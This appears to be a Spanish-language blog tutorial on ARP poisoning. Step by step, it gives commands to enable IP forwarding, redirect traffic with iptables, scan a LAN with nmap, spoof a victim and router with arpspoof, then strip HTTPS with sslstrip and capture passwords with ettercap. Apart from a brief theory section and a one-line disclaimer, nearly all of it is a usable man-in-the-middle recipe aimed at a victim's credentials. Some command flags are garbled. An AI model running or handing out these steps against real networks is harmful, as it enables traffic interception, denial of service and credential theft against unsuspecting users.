Ejemplo de un envenenamiento por ARP

 Como realizar un envenenamiento por ARP.

Haga un uso responsable y legal de este post.

Primero un poco de teoría y luego como un ejemplo de como puedes ejecutarlo para comprobar la fortaleza de tus contraseñas.

El ARP Spoofing, también conocido como ARP Poisoning o ARP Poison Routing, es una técnica usada para infiltrarse en una red ethernet conmutada (basada en switches y no en hubs), que puede permitir al atacante leer paquetes de datos en la LAN (red de área local), modificar el tráfico, o incluso detenerlo.

Partimos de la premisa que es fundamental encontrarse dentro de la red por lo que donde es mas probable que esta técnica se realice en una red wireless.

Este esquema puede servirnos como ejemplo.

 

Pasos a seguir:

Para la ejecución utilizamos el sistema back|track 5 R3 es totalmente gratuito pudiendo descargarlo desde aquí.

*******************Nota importante no debemos de olvidarnos de que una vez instalado debemos saber que login es root y la contraseña es toor y seguidamente hemos de escribir startx para inciarlo*******************

1 escribimos en una terminal

echo 1 > /proc/sys/net/ipv4/ip_forward

 

2 luego en la misma terminal

iptables -t nat -A PREROUTING -p tcp –destination -pot 80 -j REDIRECT –to-port 1000

 

No cerramos esta teminal durante todo el proceso.

 

3 Si necesitamos saber nuestra dirección ip podemos hacerlo mediante  mediante ifconfig (en otra terminal)

 

4 hacemos un escaner de la red mediante nmap

nmap -sP 192.168.1.0/24

Con ello vemos las direcciones de los objetivos que en nuestro caso son el router y ordenador que queramos, en este caso tiene la direccion 192.168.1.39

Esta terminal la podemos cerrar.

5 Abrimos otra terminal sin cerrar como he dicho la primera de todas   y escribimos.

arpspoof -i eth0 -t direccion_ordenador_atacado  direccion_rooter

p-e donde la primera es la dirección del ordenador a atacar y la segunda es la del router que hemos podido ver con el comando anterior de nmap

arpspoof -i eth0 -t 192.168.1.39 192.168.1.1

Vemos que comienza el ataque.

Pasados unos segundos comprobamos que el dispositivo atacado no tiene acceso a internet con lo que hemos conseguido un ataque tipo denegación de servicio (Deny Of Service).

Pero no nos conformamos con esto sino que podemos  hacer que el usuario se  crea que se encuentra en una conexión segura para lo que utilizamos la Herramienta SSL Strip Si la víctima no observar que HTTPS ha desaparecido de su navegador, si no se fija en ese pequeño detalle y se autentifique en algún sitio, sus credenciales irán en texto plano hacia el nosotros y,  no solo vemos las contraseñas del protocolo https sino toda las contraseñas que introduce cuando navega mediante http tan bien las capturamos.

6 abrimos SSL-STRIP

 

7 Escribimos

python sslstrip.py -l 1000

No cerramos la terminal

8 Abrimos ettercap permite  establecer ataque Man in the middle (hombre en medio). Para su apertura.

Applications-Backtrack-Privilege Escalation-Protocol Analysis-Network Sniffers-ettercap

9 escribimos

ettercap -Tq -i eth0

y solo nos basta observar para ver los datos que nos aparecen

En caso de que la victima escriba  p-e algún loginy contraseña en alguna página, estos nos datos que  que haya introducido  el dispositivo atacado nos aparecerán a notros en texto plano.

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *